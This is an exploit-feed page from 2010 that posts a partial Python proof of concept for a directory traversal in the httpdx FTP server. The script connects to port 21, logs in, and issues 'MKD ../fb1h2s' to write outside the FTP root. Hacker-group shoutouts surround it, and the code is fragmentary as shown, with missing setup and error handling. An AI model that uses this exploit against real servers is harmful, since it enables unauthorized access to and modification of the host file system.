|
Feeds -
Exploits
|
|
Written by FB1H2S
|
|
Monday, 15 February 2010 16:36 |
# Exploit Title: httpdx - ultralight http/ftp server directory Traversal| # Software Link: http://sourceforge.net/projects/httpdx/ |
| # Greetz to all Darkc0de, Andhra Hackers and ICW Memebers |
| #Thanks : Mr bond,Wipu,GOdwinAustin,The_empty,beenu,hg_H@x0r,r45c4l,it_security,eberly |
| #Shoutz : SMART_HAX0R,j4ckh4x0r,41w@r10r,Hackuin |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| sock.connect((hostname, 21)) |
| print ("Connection error!") |
| sock.send("user %s\r\n" %username) |
| sock.send("pass %s\r\n" %passwd) |
| # The FTP root is example.com we could move down the root directory |
| sock.send("MKD ../fb1h2s\r\n") |
sys.exit(0);
|